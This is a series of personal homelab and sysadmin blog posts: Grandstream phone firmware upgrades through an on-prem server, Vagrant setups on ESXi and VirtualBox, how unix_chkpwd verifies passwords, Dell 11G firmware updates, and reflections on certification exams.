Wanting to save time and to simulate an actual company, I quickly gave up on both Asterisk and FreeSwitch. As the meme goes: "Ain't nobody got time fo' that!"

A little search further led me to 3CX, a commercial PBX solution that provides a free edition for (very limited) small environments. They offer a Debian-based soft-appliance that you can deploy from ISO anywhere you like.

So:

Last night I spent from 2200-0100 mucking around with 3CX because no matter what I tried, the GXP2130 would not show up on the admin UI. The phone's in the network just fine and could also talk to 3CX, but there were a few steps missing.

Continuing this morning, I used tcpdump and other tools to ascertain that:

After lunch, things fell into place :)

  1. The phone's firmware was too old to PNP with 3CX. 
  2. Upgrading from 1.0.7.25 to 1.0.11.16 failed because the gap was too large. 

So... I upgrade the phone's firmware in four steps, using an on-prem update server. Then, after resetting the phone to factory defaults it showed up just fine and I could add it to one of my extensions!

the phone shows up

The cool part is that 3CX comes with a web UI for end-users, that also works with their browser extension for Chrome or Edge. Now I can simulate a working-from-home situation, with one user on a Windows 10 VM calling the "reception" on the Grandstream phone. Or vice versa. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

Upgrading Grandstream GXP2130 from 1.0.7.x to 1.0.11.x

2020-12-05 13:43:00

With many thanks to my friends at ITVitae and some dumpster diving I snagged two brand-new Grandstream GXP2130 IP phones, to practice VOIP in my homelab. They're pretty sexy phones! Nice build quality and a very decent admin interface: a great first step into the world of VOIP / SIP. 

Out of the box, these two phones came with the dated 1.0.7.25 firmware. No matter what I tried, they refused to upgrade to the current version 1.0.11.16. Pointing them at the Granstream firmware site? Nothing. Pointing them at a local web server with the 1.0.11.16 firmware? Nothing. 

After a bit of searching, I found a helpful thread on the GS support forums that suggests that the firmware version gap is simply too great. We need to apply a few of the in-between versions, one by one.

As a work-around I built my own firmware upgrade server, in the VOIP network segment of my homelab. A simple CentOS 7 box with Apache. I then did the following:

cd /tmp
wget http://www.grandstream.com/sites/default/files/Resources/RingTone.zip
wget http://firmware.grandstream.com/Release_GXP2130_1.0.7.97.zip 
wget http://firmware.grandstream.com/Release_GXP2130_1.0.8.56.zip 
wget http://firmware.grandstream.com/Release_GXP2130_1.0.9.135.zip 
wget http://firmware.grandstream.com/Release_GXP2130_1.0.11.3.zip 
wget http://firmware.grandstream.com/Release_GXP2130_1.0.11.16.zip 

unzip RingTone.zip
for FILE in $(ls Release*zip); do unzip $FILE; done

cd /var/www/html
sudo mkdir 7 8 9 11

sudo cp /tmp/ring* 7/; sudo cp /tmp/Rel*.7.*/*bin 7/
sudo cp /tmp/ring* 8/; sudo cp /tmp/Rel*.8.*/*bin 8/
sudo cp /tmp/ring* 9/; sudo cp /tmp/Rel*.9.*/*bin 9/
sudo cp /tmp/ring* 11/; sudo cp /tmp/Rel*.11.*/*bin 11/

sudo chmod -R o+r *

From there on out, run a "sudo tail -f /var/log/httpd/access.log" to see if the phone is actually attempting to pick up the relevant update files.

Then, on the phone, login as "admin" and browse to Maintenance > Upgrade and Provisioning. Set the access method to HTTP. As the Firmware Server Path set the IP address of the newly built upgrade server (e.g. 192.168.210.100), followed by the version path. We will change this path for every version upgrade.

For example:

First update to 1.0.7.97: set the path, click Save and Apply, then at the top click Provision. You should see the phone downloading the firmware update in "access.log". Once the phone has rebooted, check the web interface for the current version number.

Then "lather, rince and repeat" for each consecutive version. After 7, upgrade to 8, then to 9, then to 11 (this works without issues). In the end you will have a Grandstream phone running 1.0.11.16, after starting at 1.0.7.25.

Afterwards: don't forget to reset the phone to factory defaults, so it will correctly join your PBX for auto-provisioning. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

Fun in the homelab: Vagrant and ESXi

2020-12-02 19:16:00

It's been a while since I've worked in my homelab, between my day-job and my teaching gig there's just been no time at all. But, with my EX407 around the corner it's time to hammer Ansible home!

Of course, it's tempting to get sidetracked! So when Tomas' Lisenet practice exam for EX407 suggests I need five VMs with RHEL, I go and find a way to build those post-haste. Now that I've been playing with Vagrant more often, that's become a lot easier!

First, there's a dependency: you will need to download and install a recent version of VMware's OVFTool. Make sure that its binary is in your $PATH

After that, JosenK's Vagrant plugin for VMware ESXi makes life so, so easy! On my Linux workstation it was as easy as:

$ sudo apt install vagrant
$ vagrant plugin install vagrant-vmware-esxi
$ mkdir vagrant-first-try; cd vagrant-first-try
$ vagrant init
$ vi Vagrantfile

After which the whole Vagrantfile gets replaced as follows:

nodes = {
   "vagrant1.corp.broehaha.nl" => ["bento/centos-8", 1, 512, 50 ],
   "vagrant2.corp.broehaha.nl" => ["bento/centos-8", 1, 512, 50 ],
   "vagrant3.corp.broehaha.nl" => ["bento/centos-8", 1, 512, 50 ],
   "vagrant4.corp.broehaha.nl" => ["bento/centos-7", 1, 512, 50 ],
   "vagrant5.corp.broehaha.nl" => ["bento/centos-7", 1, 512, 50 ],
}

Vagrant.configure(2) do |config|
  nodes.each do | (name, cfg) |
    box, numvcpus, memory, storage = cfg
    config.vm.define name do |machine|

      machine.vm.box      = box
      machine.vm.hostname = name
      machine.vm.synced_folder('.', '/Vagrantfiles', type: 'rsync')

      machine.vm.provider :vmware_esxi do |esxi|
        esxi.esxi_hostname         = '192.168.0.55'
        esxi.esxi_username         = 'root'
        esxi.esxi_password         = 'prompt:'
        esxi.esxi_virtual_network  = "Testbed"
        esxi.guest_numvcpus        = numvcpus
        esxi.guest_memsize         = memory
        esxi.guest_autostart       = 'true'
        esxi.esxi_disk_store       = '300GB'

      end
    end
  end
end

To explain a few things:

Any requirements? Yup!

 


kilala.nl tags: , , ,

View or add comments (curr. 1)

Chocolatey Git on Windows: where is my SSH configuration?!

2020-11-10 19:52:00

For a while now, I've been using Git + SSH on Windows 10 and I've been very content about the whole setup.

Git was installed using Chocolatey, just because it's easy and takes care of a few things for you. But it turns out it was a little bit "too much" in the background, as it turns out. 

I wanted to move my SSH files (private key, known_hosts etc) to OneDrive, thus changing the path to the files. I just couldn't figure out where the SSH client configuration for the Git from Chocolatey was tucked away. This Git does not use the default OpenSSH client delivered by Windows 10 C:\windows\system32\OpenSSH\ssh.

An hour of searching made me realize that "git.install", the package from Choco, includes a mini-Unix-like environment. It's not Git on Windows: it runs on MINGW-W64

I found the following files, which define the behavior of the Choco-installed Git + SSH:

In the latter file, you can set UserKnownHostsFile and IdentityFile to set the file path for the private key and known_hosts.


kilala.nl tags: , ,

View or add comments (curr. 0)

Updated: Running VirtualBox, Docker and Hyper-V on Windows 10

2020-11-09 20:53:00

A while back I wrote detailed instructions on how we managed to get VBox to run on Windows 10 with Hyper-V remaining enabled. This required a little tweaking, but it allowed us to retain all of the Win10 security features offered by Hyper-V.

Recently the VirtualBox team released version 6.1.16 which includes a number of improvements aimed at Windows 10 and "Windows Hypervisor Platform". 

You now no longer need any of the tweaks I described earlier! Vanilla VirtualBox 6.1.16 runs on top of Hyper-V and WHP without further issues. SHA2 hashing works well and GCrypt no longer needs to have its acceleration disabled! This makes life so much easier!


kilala.nl tags: , ,

View or add comments (curr. 0)

Understanding pam_unix and unix_chkpwd

2020-10-24 23:49:00

One of the benefits of teaching Linux to a group of young adults, is that it forces me to go back to the books myself. The Linux+ objectives cover a few things I haven't worked with yet (such as MDM), but also touches on things I haven't given much thought yet. Case in point: PAM.

Just about every Linux sysadmin certification exam requires that you can work with Pluggable Authentication Modules. They want you to make your SSHd or SU authenticates correctly, or to include pam_tally. So we learn about /etc/pam.conf and /etc/pam.d/* and how to setup an auth or session stack correctly. 

What led me down a rabbithole was this: what if I want to make a Python app that authenticates users? I found references to python-pam and other modules, but most discussions ended with: "You need to run as root, or add your application user to the shadow group."

Initially this felt odd to me because, aren't we teaching everybody that services shouldn't run as "root"? In the end it does make sense, of course, because if any arbitrary user could (ab)use PAM to verify another user's password that'd be problematic. The process might be very noisy, but you could still try to brute-force the password. 

One source of confusion was the pam_unix documentation, which states:

"A helper binary, unix_chkpwd(8), is provided to check the user's password when it is stored in a read protected database. This binary is very simple and will only check the password of the user invoking it. It is called transparently on behalf of the user by the authenticating component of this module. In this way it is possible for applications like xlock(1) to work without being setuid-root."

Stupidly my brain glossed over the important parts (I need sleep) and latched onto the "without being setuid-root". The important part being that it "will only check the password of the user invoking it". 

What made me finally understand the workings of unix_chkpwd is a project of Marco Bellaccini's that I found on Github -> chkpwd_buddy. It should me the proper way of interacting with unix_chkpwd as a non-root user: FIFO pipes. 

$ mkfifo /tmp/myfifo

$ echo -ne 'testing\0' > /tmp/myfifo &
$ /sbin/unix_chkpwd tess nullok < /tmp/myfifo
$ echo $?
0

$ echo -ne 'testing\0' > /tmp/myfifo &
$ /sbin/unix_chkpwd testaccount nullok < /tmp/myfifo
$ echo $?
7

$ sudo -i
# mkfifo /tmp/rootfifo

# echo -ne 'testing\0' > /tmp/rootfifo &
# /sbin/unix_chkpwd tess nullok < /tmp/rootfifo
# echo $?
0

# echo -ne 'testing\0' > /tmp/rootfifo &
# /sbin/unix_chkpwd testaccount nullok < /tmp/rootfifo
# echo $?
0

Root can verify both my "tess" password and the one on "testaccount", while I could only verify my own password with my normal account. 

What's interesting, is that only the failed validation attempt shows up in journalctl. The successful attempts are not registered:

$ sudo journalctl -t unix_chkpwd
Oct 22 16:08:53 kalivm unix_chkpwd[86131]: check pass; user unknown
Oct 22 16:08:53 kalivm unix_chkpwd[86131]: password check failed for user (test)

To sum it up, if you want a Python app to authenticate the running-user's identity, you can use the python_pam module. But if you want the Python app to authenticate any/every user, then it will need to run as "root". 


kilala.nl tags: , ,

View or add comments (curr. 0)

Running VirtualBox together with Hyper-V on Windows 10

2020-10-06 19:30:00

EDIT: The tweaks outlined in this blog post are no longer needed. Read this update!

Sometimes you just have an odd need or craving! You just have to have some spicy curry udon after midnight! You just have to get an old RAID controller to work in your homelab! Or in this case: you just really have to get VirtualBox and Hyper-V to play nice on Windows 10. 

That's something that just wouldn't fly until recently. But now it'll work!

 

I would like to extend my warmest thanks to my colleage Praveen K-P, who worked with me to figure all of this out. =)

 

Requirements

 

Caveats

These instructions are a work-in-progress and the solution is not 100% rock-solid.

Some mathematical functions, such as SHA2 or CRC, may fail depending on the OS you run in the VM. This means that outright installing an OS from DVD or ISO may fail during extraction: SHA1 or SHA2 checksums won't match up and the installer will refuse to continue. This is likely caused by the layered CPU virtualization and is under research with the VirtualBox team.

Also, please be careful when choosing base images for your VirtualBox VMs! Do not assume that you can trust every VM image on the Vagrant repositories! Only install images from trusted providers such as:

Installing untrusted base images may lead to malware infections or worse.

 

Installation

  1. Enabled the Windows optional feature "Windows Hypervisor Platform".
    1. Go to Add/Remove Programs → Turn Windows Features on/off.
    2. Make sure there are checkmarks at both "Hyper-V" and "Windows Hypervisor Platform".
  2. Install the latest VirtualBox, but at least >=6.1.10.
  3. Install Vagrant.

 

For example: running Kali Linux

Kali Linux is one of the distributions whose installation fails due to the caveat involving mathematical functions. So let's use Vagrant instead, which pulls pre-built images from an online repository. 

Open Powershell. Run the following commands:

        cd $HOME
        mkdir Vagrant; cd Vagrant;
        vagrant init kalilinux/rolling

Before continuing, edit the "vagrantfile" file (e.g. with Notepad) and replace this line:

       config.vm.box = "kalilinux/rolling"

 

With the following configuration. Edit the amount of RAM and CPUs to your liking. Me, I like 6GB and 3 cores.

    config.vm.define "kali" do |kali|
        kali.vm.box = "kalilinux/rolling"
        kali.vm.hostname = "haxor"

        kali.vm.provider "virtualbox" do |vb|
            vb.gui = true
            vb.memory = "6144"
            vb.cpus = 3
            vb.customize [ "modifyvm", :id, "--paravirtprovider", "minimal" ]
        end

        kali.vm.synced_folder '.', '/vagrant', disabled: true

        kali.vm.provision "shell", inline: <<-SHELL
            echo "Here we would install..."
            [[ ! -d /etc/gcrypt ]] && mkdir /etc/gcrypt
            [[ ! -f /etc/gcrypt/hwf.deny ]] && echo "all" >> /etc/gcrypt/hwf.deny
        SHELL
    end

 

Save the configuration file and now run the following in Powershell: 

        vagrant up kali

The init-command sets up your "Vagrant" directory and basic configuration file. By editing the "vagrantfile" we can change a lot of the behavior, including the way Kali perceives the VirtualBox hypervisor. We also tweak GCrypt, so it will refuse to try hardware accellerated cryptography. Both are required to make hashing and other maths work better.

The up-command actually starts the build of the VM, after which it is booted. The first installation will take a few minutes, after that you can just manage the VM using the VirtualBox user interface. 

The Kali Linux Vagrant build includes the full graphical user interface! But you can also ssh -P 2222 vagrant@localhost  to login to the VM. Be sure to create your own account and to change all passwords!

 

GCrypt fix

Your Linux distribution may have problems performing SHA2 calculations correctly. According to this source, it’s “Because apt use sha256 method from libgcrypto20, but optimized too much. We can deny this opt. using configuration file /etc/gcrypt/hwf.deny.” 

        $ sudo bash
        # mkdir /etc/gcrypt
        # echo all >> /etc/gcrypt/hwf.deny
 

In addition, we learned that in our nested situation (VirtualBox on top of Hyper-V) it may be a good idea to change your VM's "paravirtualization interface" from "Normal" to "Minimal". #TIL that this is not about how VBox provides better performance, but about what paravirtualization information is passed to the guest OS. In my case this change did fix hashing problems. This change can be made manually by editing the VM settings in VirtualBox (VM → Settings → System → Acceleration → Paravirtualization interface), or in the Vagrant file:

        vb.customize [ "modifyvm", :id, "--paravirtprovider", "minimal" ]

 

Example Vagrantfile with two VMs 

Vagrant.configure("2") do |config|

  config.vm.define "kali" do |kali|
    kali.vm.box = "kalilinux/rolling"
    kali.vm.hostname = "haxor"
    kali.vm.network "forwarded_port", guest: 22, host: 2222, host_ip: "127.0.0.1"
    kali.vm.network "forwarded_port", guest: 3389, host: 2389, host_ip: "127.0.0.1"

    kali.vm.provider "virtualbox" do |vb|
        vb.gui = true
        vb.memory = "6144"
        vb.cpus = 3
        vb.customize [ "modifyvm", :id, "--paravirtprovider", "minimal" ]
    end

    kali.vm.synced_folder '.', '/vagrant', disabled: true
 
    kali.vm.provision "shell", inline: <<-SHELL
        echo "Here we would install..."
        [[ ! -d /etc/gcrypt ]] && mkdir /etc/gcrypt
        [[ ! -f /etc/gcrypt/hwf.deny ]] && echo "all" >> /etc/gcrypt/hwf.deny
    SHELL

  end


  config.vm.define "centos8" do |centos8|
    centos8.vm.box = "centos/8"
    centos8.vm.hostname = "centos8"
    centos8.vm.box_check_update = true

    centos8.vm.network "forwarded_port", guest: 22, host: 2200, host_ip: "127.0.0.1"

    centos8.vm.provider "virtualbox" do |vb|
        vb.gui = false
        vb.memory = "1024"
        vb.cpus = 1
        vb.customize [ "modifyvm", :id, "--paravirtprovider", "minimal" ]
    end

    centos8.vm.provision "shell", inline: <<-SHELL
        echo "Here we would install..."
        [[ ! -d /etc/gcrypt ]] && mkdir /etc/gcrypt
        [[ ! -f /etc/gcrypt/hwf.deny ]] && echo "all" >> /etc/gcrypt/hwf.deny
    SHELL

    centos8.vm.synced_folder '.', '/vagrant', disabled: true

  end

end

kilala.nl tags: , ,

View or add comments (curr. 0)

Finally! Red Hat offers at-home exams

2020-09-06 21:18:00

It's been a while in coming and I'm very happy they finally made it! Red Hat have joined the large number of companies who now offer at-home test taking for their professional certifications

I quite enjoyed the way CompTIA handled their at-home examinations, but it looks like Red Hat have taken a very different approach. I still need to take the EX407 exam, so I'd better take a quick look!

Back in 2013 I was one of the first hundred people to use the Red Hat Kiosk exams, still have the souvenir key chain on my laptop bag. Let's see if their at-home tests work better than the Kiosk ones. 


kilala.nl tags: , ,

View or add comments (curr. 1)

Taking the 2020 CompTIA Cloud+ beta

2020-08-13 11:35:00

It's become a bit of a hobby of mine, to take part in CompTIA's "beta" exams: upcoming versions of their certification tests, which are given a trial-run in a limited setting. I've gone through PenTest+, Linux+ and CySA+ so far :)

After failing to get through the payment process at PearsonVue a friendly acquaintaince at CompTIA helped me get access to the Cloud+ beta (whose new version will go live sometime early next year).

I sat the beta test this morning, using the new online, at-home testing provided by PearsonVue. Generally speaking I had the experiences as outlined in the big Reddit thread.

Most importantly, on MacOS the drag-n-drop on PBQs is really slow. You have to click and hold for three seconds before dragging something. Aside from that the experience was pleasurable and it all worked well enough.

I'm not as enthused about the Cloud+ beta as I was about Linux+ and PenTest+ at the time. The questions seemed very repetitive, sometimes very predictable (if "containers" was an option, two out of three times it'd be the correct answer) and some just unimaginative (just throw four abbreviations or acronyms at the test-taker, two or three of which are clearly unrelated). Knowing CompTIA I assume there will be plenty of fine-tuning happening in the next few months.

I'm pretty sure I didn't pass this one, but I'm happy to have had the chance to take a look :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Preparing for PearsonVue at home, online testing

2020-08-12 15:35:00

This Reddit thread offers a plethora of information on the at-home, online test taking offered by PearsonVue.

Big lesson I learned as MacOS user: disable Little Snitch and other filtering / security software while you're taking the test. It feels dirty, but to ensure the software does not encounter any hickups (which may result in you botching the test) you're going to have to. Better yet, don't disable, but quit the software because any popups on your screen will also alert the proctor.

Just to be safe, I made a dummy user account on my Macbook, so I can remove all trace of the software afterwards. Luckily it runs from your downloads folder and doesn't need any admin-level access.


kilala.nl tags: , ,

View or add comments (curr. 0)

Teaching helps you break habits

2020-08-09 19:39:00

It's hilarious how stuck in one's ways one can get. I mean, I've always typed:

netstat -a | grep LISTEN | grep ^tcp

While prepping slides for my students, imagine my mirth when I learned "there's a flag for that". Man, it pays to read man-pages. 

netstat -l4
ss -l4

#EternalNewbie 💖


kilala.nl tags: , ,

View or add comments (curr. 0)

Expanding my homelab: more 11th gen Dell

2020-08-01 20:21:00

R410 and R710

The Dell R410 in my homelab has served me very well so far! With a little upgrade of its memory it's run 20 VMs without any hassle. Finding this particular configuration when I did (at a refurbishing company) was a lucky strike: a decent price for a good pair of Xeons and two large disks. 

I've been wanting to expand my homelab, to mess around with vMotion, Veeam and other cool stuff. Add in the fact that I'd love to offer "my" students a chance to work with "real" virtualization (using my smaller R410) and you've got me scouring various sources for a somewhat bigger piece of kit. After trying a Troostwijk auction and poking multiple refurbishers I struck gold on the Tweakers.net classified ads! 

Pictured above is my new Dell R710, the slightly beefier sister of the R410. It has space for more RAM, for more disk drives and most importantly (for my own sanity): it's a 2U box with larger fans which produces a lot less noise than the R410. The seller even included the original X5550 CPUs seperately.

So! From the get-go I decided to Frankenstein the two boxes, so I could actually put the R410 to use for my students while keeping a bit more performance in my homelab. 

Moving that RAID1 set from the R410 to the R710 was an exciting exercise!

I really did not want to loose all of my VMs and homelab; I've put a year into the environment so far! Officially and ideally, I would setup VMware ESXi on the R710 and then migrate the VMs to the new host. There are many methods:

Couldn't I do it even faster? Well sure, but you can't simply move RAID sets between servers! Most importantly: you'll need similar or the same RAID controllers. In a very lucky break, both the R410 and the R710 have the Dell/LSI Perc 6i. So, on a wish and a prayer, I pludged the RAID set and told the receiving Perc 6i to import foreign configuration. And it worked! 

After booting ESXi from the SD card, it did not show any of the actual data which was a not-so-fun surprise. Turns out that one manual re-mount of the VMFS file system did the trick! All 24 VMs would boot!

So far she's a beaut! Now, onwards, to prep the R410 for my students.


kilala.nl tags: , ,

View or add comments (curr. 0)

CTT+ certification achieved!

2020-07-10 13:45:00

It's official! After passing the theoretical exam in June and completing the practical, virtual classroom assessment this week, I'm now officially CTT+ certified: CompTIA CTT+ Virtual Classroom Trainer Certification.

Many thanks to the people who supported me; you know who you are! 💝


kilala.nl tags: ,

View or add comments (curr. 0)

Dell 11G (11th generation) server firmware updates in 2020

2020-06-13 22:20:00

Update:

One Reddit user suggests that, while my suggested way of working is easier than others, it may also lead to "bricking" of servers: literally rendering them unusable, by applying firmware updates out of order. 

Their suggestion is to instead use the SUU (Server Update Utility) ISO image for the server in question, which may be run either from a booted Windows OS, or through the LCM (Life Cycle Manager). 

More information about the SUU can be found here at Dell.

Also, if you take a look at Dell's instruction video about using the SUU ISO from the LCM, I think we can all agree that this in fact the easiest method bar none. 

EDIT: If it weren't for the fact that the old LCM firmware on the R410 cannot read the SUU files. So you have to use this with Windows or CentOS.

 

TLDR:

If you want to skip all the blah-blah:

 

Introduction

Early in 2019 I purchase a Dell R410, part of Dell's eleventh generation (11G) server line-up from 2010/2011. Since then I've had a lot of fun growing and maintaining my homelab, learning things like Ansible and staying in touch with Linux and Windows administration. 

One task system administrators commonly perform, is the upgrading of firmware: the software that's built into hardware to make it work. If you check out the list of available firmware options for the R410, you'll see that quite a lot of that stuff goes into one simple server. Imagine what it's like to maintain all of that stuff for a whole rack, let alone a data center full of those things!

In the case of the R410, support options from Dell are slipping. While many homelabs (and some enterprises) still rock these now-aging servers, the vendor is slowly decreasing their active support.

In my homelab I have tackled only a small number of firmware updates and I'll quickly discuss the best/easiest way to tackle each. In some cases it took me days of trying to figure them out!

 

A note about Dell's Life Cycle Manager (LCM)

Dell's 11G systems (and later) include the Life Cycle Manager (LMC) which makes firmware updates a lot easier. You reboot your server into the USC (Unified System Configurator), launch the updater and pick the desired firmware updates.

Here's a demo on YouTube.

Unfortunately, the bad news is that somewhere in 2018 Dell dropped the 11G updates from their "catalogs". You can still use the following steps to make your 11G system check for updates, but it won't find any. You can check the catalogs yourself at https://ftp.dell.com/catalog/. Mind you, based on this forum thread, the Dell ftp/downloads site hasn't been without issues over the years.

  1. Boot your server and press F10 to launch System Services.
  2. In the menu, choose USC Settings (or whichever option lets you configure networking). By default USC will not retain its network configuration, or properly start the NIC, so you have to run this configuration each time.
  3. After configuring the network access, go back to the USC menu and choose to Launch the updater
  4. Apply the following settings:
    Server = ftp.dell.com
    Username =
    Password =
    Catalog path = /catalog/
    Proxy =
  5. If you now start the update process, the system will fetch and verify the catalog after which it will throw the following error.
"No update is available. Make sure that the Windows(R) catalog and Dell(TM) Update Packages for Windows(R) are used."

There are no more updates for 11G systems available for LCM.

 

A note about Dell Repository Manager

Technically it's possible to make your own internal clone of Dell's software update site. For a large enterprise, that's a great idea actually! Dell's recommended way of setting up a mirror to host updates for your specific systems, is to use the Repository Manager (DRM).

You could also use DRM to create a bootable USB stick that contains the updates you want, so the system can go and update itself, using LCM. Great stuff!

But you're still going to run into the same issue we discussed in the previous paragraph: 11G updates are no longer available through the catalogued repository. You can only get them from the Dell support site, as per below.

So for 11G, forget about DRM. For anything besides the iDRAC, you will need to boot an OS to update your firmware.

 

iDRAC6 update

Updating the iDRAC integrated management system (if you have it) is the easiest task, assuming that you have the full Enterprise kit with the web GUI. 

  1. Visit Dell's support site for your hardware, like here for the R410
  2. Download what is labeled as the latest "Dell iDRAC monolithic release".
  3. The downloaded file is a .exe self-extracting ZIP file. If you open this ZIP file, you will find a file with extension .d6 in there. 
  4. Visit your iDRAC6 web GUI and choose Update Firmware from the Quick Launch Tasks list. 
  5. Upload the .d6 file we extracted and let the iDRAC do its magic. 

 

Booting an OS to perform updates: BIOS and LCM

My R410 runs VMware ESXi which, while it's a Unix, is not supported to run Dell's firmware updates from. Dell support a plethora of Windows versions, a few other OSes and (for the 11G systems) RHEL 5 or 6 (Red Hat Enterprise Linux). 

I first wanted to try CentOS 6 (a RHEL 6 derivative), because that's an OS I'm quite comfortable with. I grabbed an ISO for CentOS 6 Live, used dd to chuck it onto a USB stick and booted the OS. Running the BIOS and LCM updates worked fine.

  1. On the Dell support site for R410, make sure to choose "Red Hat Enterprise Linux 6" as the target OS.
  2. Then grab the "Dell Server BIOS PowerEdge R410 Version 1.14.0" and "Dell Lifecycle Controller v1.7.5" downloads.
  3. You'll get a .BIN file, which is a shell script including binary content. Basically the Linux equivalent of a self-extracting ZIP. 
  4. Put these .BIN files on another USB stick, or download them using the browser on the CentOS live OS. 
  5. From a terminal, literally run the .BIN file as you would a shell script. It'll do what you need, or maybe throw an error or two that should be easily solved.

However, the BMC update proved to be quite a mess! In the .BIN package you'll find a rat's nest of shell scripts and binaries which have dependencies not available by default on the CentOS 6 live DVD (like procmail and a bunch of older C libraries). I tried fighting my way through all the errors, manually tweaking the code, but finally decided against it. There has to be an easier way!

 

Booting an OS to perform updates: BMC

Thanks to a forum thread at Dell, I learned that there is in fact an easier way. Instead of fighting with these odd Linux packages, let's go back to good ol' trusted DOS! 

FreeDOS that is!

I learned that booting FreeDOS from a USB stick on the R410 is problematic. In my case: it's a no-go. So I took FreeDOS 1.3 and burned their Live CD to a literal CD-ROM. Stuck that in the R410's DVD drive and it boots like a charm!

While FreeDOS does not have USB drivers, there is some magic in the underlying boot loaders that will mount any USB drives attached to the system during boot-time. The USB stick I put in the back USB port was made available to me as C:, while the booted CD-ROM was R:.

What do you put on that USB stick? The contents of the PER410*.exe files available from Dell's support site. Each of these is yet another self-extracting ZIP file, containing all the needed tools for the update. 

After removing the two iDRAC modules (read below) and getting the correct update (see below also), I followed the instructions from Dell's support team in that forum thread,  extracted the ZIP file onto the USB stick, booted FreeDOS and ran "bmcfwud". The system needed a reboot and a second run of bmcfwud. And presto! My BMC was updated!

 

A note about BMC and iDRAC

BMC stands for Baseboard Management Controller. It's Dell's integrated IPMI-based management system, which is literally integrated into the motherboard of the 11G systems. It'll let you do some basic remote management. The most important reason for homelab admins to consider updating BMC is to get version >=1.33 which greatly decreases fan noise

BMC was superceded by iDRAC (integrated Dell Remote Access Controller), which offers cool features like SSH access, a web GUI and much, much more features! Here's a short discussion about it.

For all intents and purposes iDRAC replaces BMC. If you have an iDRAC installed, the BMC will not be active on your 11G system. The fan noise issues on the R410 should be fixed with any recent version of the iDRAC firmware.

So why did I want to update the BMC firmware? 

Because I'm stubborn. =)

Initially, running the updater failed because it said my BMC was at version 2.92. Well, that's impossible!

Turns out, that's because I still had the iDRAC in there! :D I removed both iDRAC daughter cards and tried again. 

A downgrade? While I grabbed the most recent BMC update from Dell's site?! No thank you !

So, funny story: Dell's support site for the R410 states that the most recent available version for BMC's firmware is 1.15. The poweredgec.com site for 11G also confirms this. But if you manually search for them, you'll find newer versions:

Apparently my BMC already had 1.54, so it already had the fan updates from 1.33. Guess all the noise that thing was making was "normal". Anyway, grabbing the 1.70 update and running bmcfwud finally had the desired end result. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Ballet at La Bayadère in Almere

2020-01-09 20:42:00

I am very grateful towards my classmates and our teacher Lyda de Groodt, at ballet school La Bayadère in Almere (Facebook). They've always been awesome to our daughter, to my wife (when she still trained there) and now to me. 

As they say: "Don't judge a book by its cover". Sure, La Bayadère isn't a big brand-name corporation and no, they don't have some fancy modern studio. But they provide quality: personal guidance, a keen eye, discipline and of course a bit of fun! The students with whom I've trained want to learn proper ballet, but it's clear that we also do it for our own enjoyment. Today, I remarked to S. that "what I really love about this group, are all the smiles and laughs". Our group isn't just focused on rigorous dance, we also connect a bit on a personal level. 

I'm really happy to be training with people like T., Q., A. and I.: they never fail to make me feel like I'm twenty years younger again! ^_^

Ballet certainly is different from what you're used to seeing from me, after a sports hiatus of three years and four years of hard-hitting kendo. But I really, really enjoy it. Now that I think of it, it's funny that I haven't started writing about it earlier, seeing how voracious I was about kendo-blogging.


kilala.nl tags: , ,

View or add comments (curr. 0)

Finding study goals

2019-12-27 13:52:00

2020's right around the corner and I've been poking colleagues, urging them to set study-goals for the upcoming year. In Dutch, we have saying equating a lack of progress to deterioration: "Stilstand is de dood" ("Stagnation is death"). I believe that this proverb applies very heavily to work in IT: if you're not keeping up with the times, you're going to get out-dated real quickly. 

A colleague asked for suggestions on how to set goals for yourself, to which I replied:

I'd suggest taking into account things like A) where do you want to be in 2-3 years? B) is your team or company lacking particular knowledge or experience? C) do you, or your team, have requirements that you need to fulfill through training? D) do you see any chances that will allow you to quickly up your perceived value?

Basically: train for the job you want, fill any gaps that your team has and make sure you're not dropping any balls.

For me, EX407 fills categories B and C (my current team has little Ansible experience and it will renew my RHCE which will lapse in 1.5 years). The Python for pen-testing course will help me with A (I want to move towards red-teaming and my current coding skills are almost nill).

This year's CySA+ was for category D (it was heavily discounted and I'm pretty sure I could pass it, thus adding a well-regarded cert to my name). Ditto for trying the SANS Work/Study programme, which gets me a heavy discount on a very big-name training and cert.

Finally: just keep a list of things that you want to investigate or work on. Maintain it throughout the year, add new things, remove unwanted things, change priorities. That way you're always set for A) next year's study plans and B) that all-time favorite interview question "Where do you see yourself in two years? What are your short-term development plans?"


kilala.nl tags: , ,

View or add comments (curr. 0)

CompTIA CySA+ beta experience (CS1-002)

2019-12-09 12:53:00

Another day taken off from work for fun stuff! This time around I went in for yet another CompTIA beta exam, the new CS1-002 CySA+. Like before I sat the exam at my favorite testing center: IT Vitae in Amersfoort. The old Onze Lieve Vrouwe monastery and green surroundings make for a relaxing atmosphere! What was new this time, is that I sat the exam in tandem with my colleague D. She's great company, darn clever and she was looking to get back into the certification-game.

First up, let me point you at a great review of the CS1-002 beta exam, by u/blackvapt on Reddit. And here's the official thread on Reddit, inviting people to take part in the beta.

I will echo everything /u/blackvapt said. The new CySA+ exam is in fact good! The questions are in-depth and technical, without overly focusing on commandline options and flags. In that regard it matches my experience with the PenTest+ exam in 2018: the exam tests for insight and experience in the field of incident response. It's not something you can simply cram books for, you'll need to have experienced many of the situations discussed on the test. The thing is: it's nigh impossible to learn every log format and every OS out there, but if you can intuit the meaning of logs and commands based on your experience, you'll go a long way!

The PBQs (performance based questions) were great! I enjoyed most of them and thought them to be actually fun and a nice multi-layered puzzle. So much better than my experience with the Linux+ exam which only managed to frustrate me with its strict and limited PBQs. 

Preparation-wise I'll admit that I took it easy. I was relying mostly on A) my experience from the past 5-10 years, B) the Jason Dion practice exams for CS1-001 on Udemy and C) the Chapple & Seidl book from Sybase. I spent about twenty hours reviewing and researching, over a month's time.

I didn't spend more than $25 on the preparations, as the practice exams were on discount down to $10 and I got the C&S book through Humble Bundle in a large stack of awesome Sybex books. One note about Humble Bundle: I cannot recommend the Packt books or bundles! Skip those. But snag anything you can get from Sybex, NoStarch or O'Reilly!

Regarding the Dion practice tests: I was not passing any of these while preparing as I mentioned earlier this week. It was odd because I felt good on most of the answers I gave to Jason's questions, but I kept missing the passing grade by a fair margin. During the beta exam I felt great about ~85% of the questions, so it's really a crap-shoot on whether I passed the beta or not. :)

If I didn't pass, I wouldn't mind at all! This was a great exam, with solid challenging questions. If I don't make it, I will definitely take the exam again (at full price), now know what to expect.


kilala.nl tags: , ,

